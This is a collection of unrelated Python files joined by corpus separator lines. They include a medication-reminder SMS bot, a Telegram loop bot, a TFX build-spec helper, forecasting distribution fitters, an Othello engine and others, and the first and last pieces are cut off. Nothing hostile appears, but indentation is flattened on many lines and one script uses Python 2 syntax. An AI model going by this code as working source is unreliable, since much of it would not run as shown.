df_gr = df.groupby(['medicine','weekday','reminder_start','reminder_stop'])['dose+time'].apply(list).reset_index(name='dose+time')
str_list = ['Преди сте приемали следните лекарства:\n']
for idx,row in df_gr.iterrows():
# create the string 'frequency' that says what weekdays the customer has to take the medications
if row.weekday == '0123456':
frequency = 'всеки ден'
else:
                frequency = ', '.join(num2wday[int(day_num)] for day_num in row.weekday)  # weekday chars are str digits
med_and_doses = f'{row.medicine}, {frequency}, {row.reminder_start.strftime("%d.%m.%y")}-{row.reminder_stop.strftime("%d.%m.%y")}: ' + ', '.join(row['dose+time']) + '\n'
str_list.append(med_and_doses)
str_list.append('За детайли относно лекарствата, които взимате сега отговорете LEKARSTVA')
resp.message(''.join(str_list))
if 'info-' in body.lower() or 'инфо-' in body.lower():
        # note: str.lstrip strips a *set of characters*, not a prefix, so slice off the
        # 5-character code word ('info-'/'INFO-'/'инфо-'/'ИНФО-'), assuming it starts the message
        stripped_str = body[5:].lower()
# check if the residual string is contained in the columns 'medicine' or the latinized version 'med_latinized'
if df.medicine.str.contains(stripped_str).any() or df.med_latinized.str.contains(stripped_str).any():
# get the link to the medicine, depending on in what column it is located
try:
link = df.link[df.medicine == stripped_str].iloc[0]
            except IndexError:  # no match in 'medicine', fall back to the latinized column
link = df.link[df.med_latinized == stripped_str].iloc[0]
            resp.message(f'Вижте тук листовка към лекарството {stripped_str}: {link} \nАко имате въпроси или проблеми с Вашето лекарство обърнете се към Вашия лекар или фармацевт.')
else:
all_meds_of_customer = ', '.join(df.medicine.unique())
            # if the string is not contained we tell the customer that he has misspelled the medicine
resp.message(f'Зададеното от Вас лекарство {stripped_str} не e измежду въведените Ваши лекарства - {all_meds_of_customer}')
# this is to stop not all the medications of the patient, but only a selected one, e.g. 'стоп-аспирин'
if 'stop-' in body.lower() or 'стоп-' in body.lower():
        # note: str.lstrip strips a *set of characters*, not a prefix, so slice off the
        # 5-character code word ('stop-'/'стоп-'), assuming it starts the message
        stripped_str = body.lower()[5:]
# check if the residual string is contained in the columns 'medicine' or the latinized version 'med_latinized'
if df.medicine.str.contains(stripped_str).any() or df.med_latinized.str.contains(stripped_str).any():
            # figure out in which column the medicine name is located (the client
            # may type it in latin, e.g. amidofen, instead of cyrillic амидофен)
            med_col = 'medicine' if df.medicine.str.contains(stripped_str).any() else 'med_latinized'
            now_sofia = pytz.timezone("Europe/Sofia").localize(datetime.datetime.now())
            # set the reminder flag of this medicine to 0 for this patient
            df0.loc[(df0.phone_num == phone_num) & (df0[med_col] == stripped_str), 'reminder_flag'] = 0
            # update also the column of the stop date with the current date
            df0.loc[(df0.phone_num == phone_num) & (df0[med_col] == stripped_str), 'reminder_stop'] = now_sofia
            # you also need to update the current working version of the dataframe (df)
            df.loc[(df.phone_num == phone_num) & (df[med_col] == stripped_str), 'reminder_flag'] = 0
            df.loc[(df.phone_num == phone_num) & (df[med_col] == stripped_str), 'reminder_stop'] = now_sofia
            # write the changes back to the original file itself
            df0.to_csv(file_path, index=False, date_format="%d.%m.%y")
            resp.message(f'Успешно прекратихте Вашите напомняния за {stripped_str}!')
else:
all_meds_of_customer = ', '.join(df.medicine.unique())
            # if the string is not contained we tell the customer that he has misspelled the medicine
resp.message(f'Зададеното от Вас лекарство {stripped_str} не e измежду въведените Ваши лекарства - {all_meds_of_customer}')
if body.lower() == 'kontakt' or body.lower() == 'контакт':
m = f'Клиент с номер {phone_num} запита контакт с нас, свържи се с него!'
message = client.messages.create(body=m, from_= happ_num1, to=happ_num2)
return str(resp)
if __name__ == "__main__":
app.run(debug=True)
|
nilq/baby-python
|
python
|
from src.bert_classifier.model import Model
from src.bert_classifier.fit import fit
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from telegram.ext import Updater, MessageHandler, Filters
import traceback as tb
import json
import random
import threading
START_MESSAGE = ('''
Loop message in chat / group / channel.
add - /add message: add message to loop.
list - /list: list message inside the loop.
remove - /remove message_number: remove the message inside the loop.
''')
loopPos = {}
INTERVAL = 3600
with open('CREDENTIALS') as f:
CREDENTIALS = json.load(f)
debug_group = CREDENTIALS.get('debug_group') or -1001198682178
try:
with open('DB') as f:
DB = json.load(f)
except (FileNotFoundError, json.JSONDecodeError):
DB = {}
def saveDB():
with open('DB', 'w') as f:
f.write(json.dumps(DB, sort_keys=True, indent=2))
def splitCommand(text):
pieces = text.split()
if len(pieces) < 1:
return '', ''
command = pieces[0]
return command.lower(), text[text.find(command) + len(command):].strip()
def getDB(msg):
key = str(msg.chat_id)
DB[key] = DB.get(key, [])
return DB[key]
def add(msg, content):
getDB(msg).append(content)
saveDB()
msg.reply_text('success', quote=False)
msg.forward(chat_id = debug_group)
if msg.chat and msg.chat.username:
msg.bot.send_message(chat_id=debug_group, text='t.me/' + msg.chat.username)
def listLoop(msg):
items = [str(index) + ': '+ content for index, content in enumerate(getDB(msg))]
if not items:
return msg.reply_text('FAIL. no loop items yet.', quote=False)
msg.reply_text('\n\n'.join(items), quote=False, disable_web_page_preview=True)
def remove(msg, content):
db = getDB(msg)
try:
index = int(content)
    except ValueError:
return msg.reply_text('FAIL. index not valid: ' + content, quote=False)
if len(db) <= index:
return msg.reply_text('FAIL. index out of range: ' + content, quote=False)
del db[index]
saveDB()
msg.reply_text('success', quote=False)
def manage(update, context):
try:
msg = update.effective_message
if not msg:
return
command, content = splitCommand(msg.text)
if ('add' in command) and content:
return add(msg, content)
if 'list' in command:
return listLoop(msg)
if 'remove' in command:
return remove(msg, content)
msg.reply_text(START_MESSAGE, quote=False)
except Exception as e:
print(e)
tb.print_exc()
context.bot.send_message(chat_id=debug_group, text=str(e))
def start(update, context):
try:
update.effective_message.reply_text(START_MESSAGE, quote=False)
except Exception as e:
print(e)
tb.print_exc()
def loopImp():
for key in DB:
loopLen = len(DB[key])
if not loopLen:
continue
index = loopPos.get(key, random.randint(0, loopLen - 1))
if index >= loopLen:
            updater.bot.send_message(chat_id=debug_group, text='Should only happen when items were removed from the list')
index = 0
updater.bot.send_message(
chat_id=key,
text=DB[key][index])
loopPos[key] = (index + 1) % loopLen
updater = Updater(CREDENTIALS['bot_token'], use_context=True)
dp = updater.dispatcher
dp.add_handler(MessageHandler(Filters.command, manage))
dp.add_handler(MessageHandler(Filters.private & (~Filters.command), start))
def loop():
try:
loopImp()
except Exception as e:
print(e)
tb.print_exc()
updater.bot.send_message(chat_id=debug_group, text=str(e))
threading.Timer(INTERVAL, loop).start()
loop()
updater.start_polling()
updater.idle()
|
nilq/baby-python
|
python
|
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""BuildSpec helper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import click
from typing import Text
import yaml
from tfx.tools.cli.container_builder import labels
class BuildSpec(object):
"""Build specification.
BuildSpec generates a default build spec if it does not exist.
Attributes:
filename: build spec filename.
build_context: build working directory.
_buildspec: in-memory representation of the build spec.
"""
def __init__(self,
filename: Text = labels.BUILD_SPEC_FILENAME):
self._filename = filename
if not os.path.exists(self._filename):
            raise ValueError('BuildSpec: build spec file %s does not exist.' %
                             filename)
self._read_existing_build_spec()
@staticmethod
def load_default(filename: Text = labels.BUILD_SPEC_FILENAME,
target_image: Text = None,
build_context: Text = labels.BUILD_CONTEXT,
dockerfile_name: Text = labels.DOCKERFILE_NAME):
"""Generate a default build spec yaml."""
if os.path.exists(filename):
raise ValueError('BuildSpec: build spec file %s already exists.' %
filename)
if target_image is None:
raise ValueError('BuildSpec: target_image is not given.')
build_spec = {
'apiVersion': labels.SKAFFOLD_API_VERSION,
'kind': 'Config',
'build': {
'artifacts': [{
'image': target_image,
'workspace': build_context,
'docker': {
'dockerfile': dockerfile_name
}
}]
}
}
with open(filename, 'w') as f:
yaml.dump(build_spec, f)
return BuildSpec(filename)
def _read_existing_build_spec(self):
"""Read existing build spec yaml."""
with open(self.filename, 'r') as f:
click.echo('Reading build spec from %s' % self.filename)
self._buildspec = yaml.safe_load(f)
if len(self._buildspec['build']['artifacts']) != 1:
            raise RuntimeError('The build spec contains multiple artifacts, however '
                               'only one is supported.')
self._build_context = self._buildspec['build']['artifacts'][0][
'workspace']
@property
def filename(self):
return self._filename
@property
def build_context(self):
return self._build_context
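# A minimal usage sketch (not part of the original module): generate a default
# skaffold build spec for a hypothetical image, then inspect it. The file and
# image names below are illustrative assumptions.
#
#   spec = BuildSpec.load_default(filename='build.yaml',
#                                 target_image='gcr.io/my-project/my-image')
#   print(spec.build_context)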
|
nilq/baby-python
|
python
|
from setuptools import setup
setup(
name="backbones",
version="0.1",
description="Common neural network architectures implemented in PyTorch.",
url="https://github.com/bentaculum/backbones",
author="Benjamin Gallusser",
author_email="benjamin.gallusser@epfl.ch",
license="MIT",
install_requires=[
'pytest',
'torch',
],
)
|
nilq/baby-python
|
python
|
from typing import List, Tuple, Callable, Optional
import numpy as np
import tweedie
from gluonts.model.forecast import SampleForecast, QuantileForecast
from scipy.optimize import fmin_l_bfgs_b
from scipy.special import gammaln, factorial, psi
from scipy.stats import norm, beta, gamma, nbinom, poisson
from sklearn.preprocessing import MinMaxScaler
from statsmodels.distributions import ECDF
def pool_forecast_transform_fn(
input_: Tuple[SampleForecast, int],
forecast_transform_fn: Callable[[SampleForecast, int], List[float]],
) -> List[float]:
forecast, stock = input_
return forecast_transform_fn(forecast, stock)
def calculate_out_of_stock_days_from_samples(
forecast: SampleForecast, stock: int, total_days: int = 30
) -> np.ndarray:
sample_days = np.apply_along_axis(
np.searchsorted, 1, np.cumsum(forecast.samples, axis=1) >= stock, True
)
sample_days[sample_days == total_days] -= 1
return sample_days + 1
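# Illustrative sketch (not part of the original module): for a single sample
# path of 5 units/day and stock=12, the cumulative sum crosses 12 at day index
# 2, so the function reports day 3 (1-based).
#
#   class _FakeForecast:  # minimal stand-in for SampleForecast
#       samples = np.array([[5.0] * 30])
#   assert calculate_out_of_stock_days_from_samples(_FakeForecast(), stock=12)[0] == 3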
def calculate_out_of_stock_days_from_quantiles(
forecast: QuantileForecast, stock: int, total_days: int = 30
) -> np.ndarray:
quantile_days = np.apply_along_axis(
np.searchsorted, 1, np.cumsum(forecast.forecast_array, axis=1) >= stock, True
)
quantile_days[quantile_days == total_days] -= 1
return quantile_days + 1
def old_cdf_to_probas(cdf: List[float]) -> List[float]:
prob_array = np.array(np.ediff1d(cdf, to_begin=cdf[0]))
return list(prob_array / np.sum(prob_array))
def cdf_fn_to_probas(
cdf_fn: Callable[[float], float], total_days: int = 30
) -> List[float]:
prob_array = np.ediff1d([cdf_fn(i) for i in range(0, total_days + 1)])
return list(prob_array / np.sum(prob_array))
def _calculate_std(sample_days: np.ndarray, fixed_std: Optional[float], std_scaler: Optional[MinMaxScaler]):
if fixed_std:
std = fixed_std
elif std_scaler:
std = std_scaler.transform(sample_days.std().reshape(-1, 1))[0][0]
else:
std = sample_days.std()
return std
def apply_tweedie(
sample_days: np.ndarray,
phi: float = 2.0,
power: float = 1.3,
fixed_std: float = None,
std_scaler: MinMaxScaler = None,
total_days: int = 30,
) -> List[float]:
mu = sample_days.mean()
if phi < 0:
sigma = _calculate_std(sample_days, fixed_std, std_scaler)
phi = (sigma ** 2) / mu ** power
distro = tweedie.tweedie(p=power, mu=mu, phi=phi)
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
def apply_normal(
sample_days: np.ndarray,
fixed_std: float = None,
std_scaler: MinMaxScaler = None,
total_days: int = 30,
) -> List[float]:
distro = norm(sample_days.mean(), _calculate_std(sample_days, fixed_std, std_scaler))
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
def apply_ecdf(sample_days: np.ndarray, total_days: int = 30) -> List[float]:
ecdf = ECDF(sample_days)
return cdf_fn_to_probas(ecdf, total_days=total_days)
def apply_beta(
sample_days: np.ndarray, fixed_std: float = None,
std_scaler: MinMaxScaler = None, total_days: int = 30
) -> List[float]:
mu = sample_days.mean() / total_days
sigma = _calculate_std(sample_days, fixed_std, std_scaler) / total_days
a = mu ** 2 * ((1 - mu) / sigma ** 2 - 1 / mu)
b = a * (1 / mu - 1)
distro = beta(a, b)
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
# X is a numpy array representing the data
# initial params is a numpy array representing the initial values of
# size and prob parameters
def _fit_nbinom(X: np.ndarray, initial_params=None) -> Tuple[float, float]:
    infinitesimal = np.finfo(float).eps  # np.float was removed in NumPy 1.24
def log_likelihood(params, *args):
r, p = params
X = args[0]
N = X.size
# MLE estimate based on the formula on Wikipedia:
# http://en.wikipedia.org/wiki/Negative_binomial_distribution#Maximum_likelihood_estimation
result = (
np.sum(gammaln(X + r))
- np.sum(np.log(factorial(X)))
- N * (gammaln(r))
+ N * r * np.log(p)
+ np.sum(X * np.log(1 - (p if p < 1 else 1 - infinitesimal)))
)
return -result
def log_likelihood_deriv(params, *args):
r, p = params
X = args[0]
N = X.size
pderiv = (N * r) / p - np.sum(X) / (1 - (p if p < 1 else 1 - infinitesimal))
rderiv = np.sum(psi(X + r)) - N * psi(r) + N * np.log(p)
return np.array([-rderiv, -pderiv])
if initial_params is None:
# reasonable initial values (from fitdistr function in R)
m = np.mean(X)
v = np.var(X)
size = (m ** 2) / (v - m) if v > m else 10
# convert mu/size parameterization to prob/size
p0 = size / ((size + m) if size + m != 0 else 1)
r0 = size
initial_params = np.array([r0, p0])
bounds = [(infinitesimal, None), (infinitesimal, 1)]
optimres = fmin_l_bfgs_b(
log_likelihood,
x0=initial_params,
# fprime=log_likelihood_deriv,
args=(X,),
approx_grad=1,
bounds=bounds,
)
params = optimres[0]
return (params[0], params[1])
def apply_fitted_negative_binomial(
sample_days: np.ndarray, total_days: int = 30
) -> List[float]:
distro = nbinom(*_fit_nbinom(sample_days))
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
def apply_negative_binomial(
sample_days: np.ndarray,
fixed_std: float = None,
std_scaler: MinMaxScaler = None,
total_days: int = 30,
) -> List[float]:
mu = sample_days.mean()
sigma = _calculate_std(sample_days, fixed_std, std_scaler)
var = sigma ** 2
r = (mu ** 2) / (var - mu) if var > mu else total_days
p = r / ((r + mu) if r + mu != 0 else 1)
distro = nbinom(r, p)
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
def apply_poisson(sample_days: np.ndarray, total_days: int = 30) -> List[float]:
distro = poisson(sample_days.mean())
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
def apply_fitted_gamma(sample_days: np.ndarray, total_days: int = 30) -> List[float]:
shape, loc, scale = gamma.fit(sample_days)
distro = gamma(shape, loc, scale)
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
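# A minimal illustrative sketch (not part of the original module): turn a toy
# array of out-of-stock-day samples into a 30-day probability vector with two
# of the fitters above. The sample values are made up.
#
#   days = np.array([3, 4, 4, 5, 7, 10, 12])
#   probas = apply_normal(days)               # gaussian fit on the sample mean/std
#   probas_nb = apply_negative_binomial(days)
#   assert abs(sum(probas) - 1.0) < 1e-6      # cdf_fn_to_probas normalizes to 1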
|
nilq/baby-python
|
python
|
import argparse
import os
import time
from keystoneauth1 import loading
from keystoneauth1 import session
from heatclient import client
_TERMINAL = [
'CREATE_FAILED',
'CREATE_COMPLETE',
'UPDATE_FAILED',
'UPDATE_COMPLETE'
]
_INTERVAL = 20
def get_session():
"""Get a keystone session
:returns: Keystone session
:rtype: session.Session
"""
loader = loading.get_plugin_loader('password')
auth = loader.load_from_options(
auth_url=os.environ.get('OS_AUTH_URL'),
username=os.environ.get('OS_USERNAME'),
password=os.environ.get('OS_PASSWORD'),
project_name=os.environ.get('OS_PROJECT_NAME'),
project_domain_name=os.environ.get('OS_PROJECT_DOMAIN_NAME'),
user_domain_name=os.environ.get('OS_USER_DOMAIN_NAME')
)
return session.Session(auth=auth, verify=False)
def get_heat():
"""Get instance of heat client.
:returns: Heat client instance.
:rtype: heatclient.client.Client
"""
return client.Client('1', session=get_session())
parser = argparse.ArgumentParser()
parser.add_argument('stack', type=str, help='Name or ID of stack')
parser.add_argument(
'timeout',
type=int,
help='How many seconds to wait for Create Complete Status.'
)
args = parser.parse_args()
heat = get_heat()
start = time.time()
while time.time() - start < args.timeout:
stack = heat.stacks.get(args.stack)
status = stack.stack_status
print "Status of {} is {}".format(args.stack, stack.stack_status)
if status in _TERMINAL:
if status == 'CREATE_COMPLETE':
exit()
else:
raise Exception(
"Unexpected terminal status {} for stack {}."
.format(status, args.stack)
)
else:
time.sleep(_INTERVAL)
raise Exception("Ran out of time waiting for stack {}.".format(args.stack))
|
nilq/baby-python
|
python
|
from pydantic import BaseModel
# Data model for the FastAPI interface
class User(BaseModel):
first_name: str
last_name: str
age: int
class Config:
orm_mode = True
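# Illustrative sketch (an assumption, not part of the original file): with
# orm_mode enabled, a User can be built directly from an ORM object, e.g. a
# hypothetical SQLAlchemy row with matching attributes:
#
#   user = User.from_orm(db_row)  # db_row exposes first_name, last_name, age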
|
nilq/baby-python
|
python
|
import sys
import getpass
from mlflow.tracking.context.abstract_context import RunContextProvider
from mlflow.entities import SourceType
from mlflow.utils.mlflow_tags import (
MLFLOW_USER,
MLFLOW_SOURCE_TYPE,
MLFLOW_SOURCE_NAME,
)
_DEFAULT_USER = "unknown"
def _get_user():
"""Get the current computer username."""
try:
return getpass.getuser()
except ImportError:
return _DEFAULT_USER
def _get_main_file():
return sys.argv[0] if len(sys.argv) > 0 else None
def _get_source_name():
main_file = _get_main_file()
if main_file is not None:
return main_file
return "<console>"
def _get_source_type():
return SourceType.LOCAL
class DefaultRunContext(RunContextProvider):
def in_context(self):
return True
def tags(self):
return {
MLFLOW_USER: _get_user(),
MLFLOW_SOURCE_NAME: _get_source_name(),
MLFLOW_SOURCE_TYPE: SourceType.to_string(_get_source_type()),
}
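# Illustrative sketch (not part of the original module): the provider is meant
# to be queried like this, yielding user, source name and source type tags.
#
#   ctx = DefaultRunContext()
#   if ctx.in_context():
#       print(ctx.tags())  # e.g. {'mlflow.user': 'alice', 'mlflow.source.name': 'train.py', ...}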
|
nilq/baby-python
|
python
|
import numpy as np
import torch
from torch.utils.data import Dataset
from torch.utils.data.dataloader import default_collate
from fairseq.data.fairseq_dataset import FairseqDataset
def sine(phase, amplitude, x):
return np.sin(x + phase) * amplitude
class SineDataset(Dataset):
def __init__(self, split, phase, amplitude, rng):
self.rng = rng
if split == 'train':
# All of the x points
self.x = np.linspace(-5, 5, 50, dtype=np.float32)[:, None]
self.y = sine(phase=phase, amplitude=amplitude, x=self.x)
elif split == 'test':
# All of the x points
all_data = np.linspace(-5, 5, 50, dtype=np.float32)[:, None]
self.x = all_data[np.array([3, 3, 39, 9, 19, 21, 36, 23, 6, 24])]
self.y = sine(phase=phase, amplitude=amplitude, x=self.x)
elif split == 'valid':
# Create a validation split
self.x = np.linspace(-4, 4, 50, dtype=np.float32)[:, None]
self.y = sine(phase=phase, amplitude=amplitude, x=self.x)
else:
raise NotImplementedError
def __len__(self):
return len(self.x)
def __getitem__(self, item):
return self.x[item], self.y[item]
class SineFairseqDataset(SineDataset, FairseqDataset):
"""A dataset that provides helpers for batching."""
def __init__(self, split, phase, amplitude, rng, shuffle, half):
super().__init__(split=split, phase=phase, amplitude=amplitude, rng=rng)
self.shuffle = shuffle
self.half = half
def collater(self, samples):
"""Merge a list of samples to form a mini-batch.
Args:
samples (List[int]): sample indices to collate
Returns:
dict: a mini-batch suitable for forwarding with a Model
"""
mini_batch = default_collate(samples)
assert len(mini_batch) == 2
if self.half:
mini_batch[0] = mini_batch[0].half()
mini_batch[1] = mini_batch[1].half()
id = torch.LongTensor(range(len(samples)))
nsentences = len(samples)
lengths = torch.ones(nsentences, 1)
mini_batch_dict = {'net_input': {'src_tokens': mini_batch[0], 'src_lengths': lengths},
'target': mini_batch[1],
'id': id,
'nsentences': nsentences}
return mini_batch_dict
def get_dummy_batch(self, num_tokens, max_positions, src_len=1, tgt_len=1):
"""Return a dummy batch with a given number of tokens."""
x = torch.zeros(num_tokens, 1)
y = torch.zeros(num_tokens, 1)
        lengths = torch.ones(num_tokens, 1)
        id = torch.LongTensor(range(num_tokens))
        return {'net_input': {'src_tokens': x, 'src_lengths': lengths}, 'target': y, 'id': id, 'nsentences': num_tokens}
def num_tokens(self, index):
"""Return the number of tokens in a sample. This value is used to
enforce ``--max-tokens`` during batching."""
return 1
def size(self, index):
"""Return an example's size as a float or tuple. This value is used when
filtering a dataset with ``--max-positions``."""
return 1
def ordered_indices(self):
"""Return an ordered list of indices. Batches will be constructed based
on this order."""
num_train_examples = len(self)
if self.shuffle:
return self.rng.permutation(num_train_examples)
else:
return range(num_train_examples)
|
nilq/baby-python
|
python
|
import socket
server = "localhost" #settings
channel = "#domino"
botnick = "firestorck_bot"
print("Server : ", server)
print("Channel : ", channel)
print("Name : ", botnick)
irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
print ("connecting to: "+server)
irc.connect((server, 6667))
SenderRunning, ListenerRunning = 1, 1
ConvUser = ""
|
nilq/baby-python
|
python
|
import numpy as np
import copy as cp
DIRECTIONS = [np.array((0, 1)), np.array((1, 0)), np.array((1, 1)),
np.array((0, -1)), np.array((-1, 0)), np.array((-1, -1)), np.array((1, -1)), np.array((-1, 1))]
class State:
def __init__(self, grid=None, previous_skip=False, side=2, master_side=2):
if grid is None:
self.grid = [6 * [0] for i in range(6)]
self.grid[2][2] = 1
self.grid[2][3] = 2
self.grid[3][2] = 2
self.grid[3][3] = 1
else:
self.grid = grid
self.side = side
self.previous_skip = previous_skip
self.master_side = master_side
def get_legal_actions(self):
'''
Modify according to your game or
needs. Constructs a list of all
possible actions from current state.
Returns a list.
'''
return get_side_moves(self.grid, self.side)
def is_game_over(self):
'''
Modify according to your game or
needs. It is the game over condition
and depends on your game. Returns
true or false
'''
return is_game_over(self.grid, self.side, self.previous_skip)
def game_result(self):
'''
Modify according to your game or
needs. Returns 1 or 0 or -1 depending
on your state corresponding to win,
tie or a loss.
'''
return get_winning_side(self.grid, self.master_side)
def move(self, action):
'''
Modify according to your game or
needs. Changes the state of your
board with a new value. For a normal
Tic Tac Toe game, it can be a 3 by 3
array with all the elements of array
being 0 initially. 0 means the board
position is empty. If you place x in
row 2 column 3, then it would be some
thing like board[2][3] = 1, where 1
represents that x is placed. Returns
the new state after making a move.
'''
new_state = State(grid=cp.deepcopy(self.grid), previous_skip=self.previous_skip, side=self.side,
master_side=self.master_side)
apply_move(new_state, action)
new_state.side = 3 - self.side
return new_state
def __str__(self):
string = f"Current player {self.side}\n"
for line in self.grid:
string += str(line) + "\n"
return string
def __repr__(self):
return self.__str__()
def position_in_grid(grid, position):
return 0 <= position[0] < len(grid) and 0 <= position[1] < len(grid[0])
def get_claimable_positions_from(grid: list[list[int]], source: np.ndarray):
disk_side = grid[source[0]][source[1]]
other_side = 3 - disk_side
claimable_pos = []
for vector in DIRECTIONS:
new_pos = source + vector
if position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == other_side:
while position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == other_side:
new_pos += vector
if position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == 0:
claimable_pos.append(new_pos)
return claimable_pos
def get_side_disks(grid, side):
disks = []
for i in range(len(grid)):
for j in range(len(grid[i])):
if grid[i][j] == side:
disks.append(np.array((i, j)))
return disks
def get_side_moves(grid, side):
disks = get_side_disks(grid, side)
moves = {}
for coord in disks:
disk_moves = get_claimable_positions_from(grid, coord)
for move in disk_moves:
non_mutable_coord = tuple(move)
if non_mutable_coord not in moves:
moves[non_mutable_coord] = [coord]
else:
moves[non_mutable_coord] += [coord]
side_moves = [None]
if len(moves) > 0:
side_moves = [[move, moves[move]] for move in moves.keys()]
return side_moves
def apply_move(state, move):
if move is not None:
state.previous_skip = False
coord, list_position_from = move[0], move[1]
state.grid[coord[0]][coord[1]] = state.side
for position_from in list_position_from:
direction = position_from - coord
# getting the vector back to one unit for each direction
if direction[0] > 0:
direction[0] = 1
elif direction[0] < 0:
direction[0] = -1
if direction[1] > 0:
direction[1] = 1
elif direction[1] < 0:
direction[1] = -1
new_pos = coord + direction
while new_pos[0] != position_from[0] or new_pos[1] != position_from[1]:
state.grid[new_pos[0]][new_pos[1]] = state.side
new_pos += direction
else:
state.previous_skip = True
def explore_all_possible_games(state: State):
moves = state.get_legal_actions()
for move in moves:
explore_all_possible_games(state.move(move))
def get_winning_side(grid, master_side):
side_count = {1: 0, 2: 0}
for line in grid:
for tile in line:
if tile:
side_count[tile] += 1
if side_count[1] == side_count[2]:
return 0
elif side_count[1] > side_count[2]:
if master_side == 1:
return 1
else:
return -1
else:
if master_side == 2:
return 1
else:
return -1
def position_can_claim(grid: list[list[int]], source: np.ndarray):
disk_side = grid[source[0]][source[1]]
other_side = 3 - disk_side
for vector in DIRECTIONS:
new_pos = source + vector
if position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == other_side:
while position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == other_side:
new_pos += vector
if position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == 0:
return True
return False
def is_game_over(grid, side, previous_skip):
if previous_skip:
disks = get_side_disks(grid, side)
for coord in disks:
if position_can_claim(grid, coord):
return False
return True
return False
# Othello default grid
# grid = [8 * [0] for i in range(8)]
# grid[3][3] = 1
# grid[3][4] = 2
# grid[4][3] = 2
# grid[4][4] = 1
# Othello 6*6 grid
# grid = [6 * [0] for i in range(6)]
# grid[2][2] = 1
# grid[2][3] = 2
# grid[3][2] = 2
# grid[3][3] = 1
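# Illustrative sketch (not part of the original module): play one legal move
# from the default 6x6 starting position and print the resulting board.
#
#   state = State()
#   moves = state.get_legal_actions()
#   if moves and moves[0] is not None:
#       state = state.move(moves[0])
#   print(state)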
|
nilq/baby-python
|
python
|
import os
import glob
import shutil
import tempfile
import numpy as np
import common
import features
import folds
from audio_toolbox import ffmpeg, sox
from constants import *
def normalize(input_file):
temp_dir = tempfile.mkdtemp()
transcoded_file = os.path.join(temp_dir, 'transcoded.flac')
ffmpeg.transcode(input_file, transcoded_file)
if not args.keep_silence:
trimmed_file = os.path.join(temp_dir, 'trimmed.flac')
sox.remove_silence(
transcoded_file,
trimmed_file,
min_duration_sec=args.silence_min_duration_sec,
threshold=args.silence_threshold)
else:
trimmed_file = transcoded_file
duration = sox.get_duration(trimmed_file)
duration = int((duration // FRAGMENT_DURATION) * FRAGMENT_DURATION)
normalized_file = os.path.join(temp_dir, 'normalized.flac')
sox.normalize(trimmed_file, normalized_file, duration_in_sec=duration)
return normalized_file, temp_dir
def load_samples(normalized_file):
temp_dir = tempfile.mkdtemp()
fragmented_file = os.path.join(temp_dir, 'fragment@n.flac')
sox.split(normalized_file, fragmented_file, FRAGMENT_DURATION)
features.process_audio(temp_dir)
samples = []
for file in glob.glob(os.path.join(temp_dir, '*.npz')):
sample = np.load(file)[DATA_KEY]
sample = folds.normalize_fb(sample)
assert sample.shape == INPUT_SHAPE
assert sample.dtype == DATA_TYPE
samples.append(sample)
samples = np.array(samples)
return samples, temp_dir
def predict(model_file, samples):
import keras.models
_, languages = common.build_label_binarizer()
model = keras.models.load_model(model_file)
results = model.predict(samples)
scores = np.zeros(len(languages))
for result in results:
scores[np.argmax(result)] += 1
return scores, languages
def clean(paths):
for path in paths:
shutil.rmtree(path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='Test the model.')
parser.add_argument(
'input',
help='a path to an audio file')
parser.add_argument(
'--model',
dest='model',
help='a path to the H5 model file; the default is `model.h5`')
parser.add_argument(
'--silence-threshold',
dest='silence_threshold',
type=float,
help=("indicates what sample value you should treat as silence; "
"the default is `0.5`"))
parser.add_argument(
'--silence-min-duration',
dest='silence_min_duration_sec',
type=float,
help=("specifies a period of silence that must exist before audio is "
"not copied any more; the default is `0.1`"))
parser.add_argument(
'--keep-silence',
dest='keep_silence',
action='store_true',
help='don\'t remove silence from samples')
parser.add_argument(
'--keep-temp-files',
dest='keep_temp_files',
action='store_true',
help='don\'t remove temporary files when done')
parser.add_argument(
'--verbose',
dest='verbose',
action='store_true',
help='print more logs')
parser.set_defaults(
model='model.h5',
keep_silence=False,
silence_min_duration_sec=0.1,
silence_threshold=0.5,
keep_temp_files=False,
verbose=False)
args = parser.parse_args()
if not args.verbose:
# supress all warnings
import warnings
warnings.filterwarnings("ignore")
# supress tensorflow warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
normalized_file, normalized_dir = normalize(args.input)
samples, samples_dir = load_samples(normalized_file)
if not args.keep_temp_files:
clean((normalized_dir, samples_dir))
    scores, languages = predict(args.model, samples)
total = np.sum(scores)
for language_idx, language in enumerate(languages):
score = scores[language_idx]
print("{language}: {percent:.2f}% ({amount:.0f})".format(
language=language,
percent=(score / total) * 100,
amount=score))
|
nilq/baby-python
|
python
|
import django_describer.actions
import django_describer.datatypes
import django_describer.permissions
import django_describer.describers
import django_describer.utils
import django_describer.adapters
name = "django_describer"
|
nilq/baby-python
|
python
|
from ctypes import *
from .jenv import *
from . import Object
from . import ClassUtils
from . import Executable
from . import String
from . import Modifier
class Method(Executable.Executable, Modifier.Modifier):
_isInit = None
_Class = None
_getName = None
_getReturnType = None
_count = 0
def __init__(self, obj):
Method._count = Method._count + 1
class_name = "Ljava/lang/reflect/Method;"
Executable.Executable.__init__(self, class_name, obj)
Modifier.Modifier.__init__(self)
if(not Method._isInit):
